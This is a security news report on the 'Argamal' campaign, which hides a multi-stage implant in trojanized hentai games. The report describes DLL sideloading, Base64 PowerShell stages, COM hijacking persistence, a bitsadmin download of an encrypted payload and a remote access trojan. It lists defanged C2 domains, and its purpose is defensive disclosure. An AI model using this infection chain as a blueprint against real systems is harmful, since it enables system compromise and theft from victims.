Argamal Malware Hidden in Hentai Games Targets Users with Full System Compromise
A new malware campaign dubbed 'Argamal' is distributing a sophisticated implant hidden within 'hentai' games, leading to full system compromise and remote control capabilities for attackers.
Security researchers have uncovered a novel malware campaign, named 'Argamal,' that leverages the distribution of adult-themed 'hentai' games to infect unsuspecting users. First detected in April 2026, this campaign embeds a malicious implant within these games, which, after a delay of several days, downloads and executes a potent Trojan. This Trojan ultimately grants attackers comprehensive control over the victim's system.
The initial infection vector involves trojanized game files distributed through dedicated websites and torrent trackers, including AniRena. These archives contain legitimate game files alongside a modified FFmpeg DLL. This DLL imports a function from a file named natives2_blob.bin, which, upon loading with the game, executes a Base64-encoded PowerShell script. This script, referred to as Stage1, performs checks to ensure it is not running in a sandbox environment before establishing persistence.
Stage1 employs a COM hijacking technique to maintain its foothold on the victim's machine. It modifies registry keys, specifically the InprocServer32 entry for the Windows Color System Calibration Loader DLL, and sets up a scheduled task. This task is designed to execute three days after the initial infection, ensuring a delay before the next stage of the attack is initiated.
The scheduled task triggers Stage2, a PowerShell script responsible for downloading the main payload. Stage2 uses bitsadmin.exe to fetch an AES-CBC encrypted file named zaesdl.dat from GitHub. This payload is then decrypted using a specific key and Initialization Vector (IV), and saved as a DLL file. This decrypted payload is then configured to be executed by a legitimate Windows COM object, ensuring it runs every time the user logs in.
The final payload is a Remote Access Trojan (RAT) with extensive capabilities. Early versions utilized a rolling XOR key for decryption, while more recent variants employ string encryption with a custom substitution cipher. The RAT communicates with its command and control (C2) servers, with identified domains including asper1[.]freeddns[.]org and Winst0[.]kozow[.]com, both resolving to the same IP address. The malware also actively checks for the presence of numerous security solutions, attempting to evade detection.
Kaspersky solutions detect the various stages of this threat under multiple classifications, including Trojan.Win32.Termixia.*, Trojan.Win32.Agent.*, HEUR:Trojan.Win32.Argamal.gen, and HEUR:Trojan-Downloader.Win32.Argamal.gen. The campaign's longevity, with suspicious DLLs existing since at least 2024, suggests a persistent and evolving threat actor.
The use of legitimate game engines like RenPy and RPG Maker MV, combined with the deceptive distribution method, highlights a concerning trend of malware authors exploiting niche interests to reach potential victims. The multi-stage infection process, involving PowerShell scripts and COM hijacking for persistence, demonstrates a sophisticated approach to evading initial security measures and achieving deep system compromise.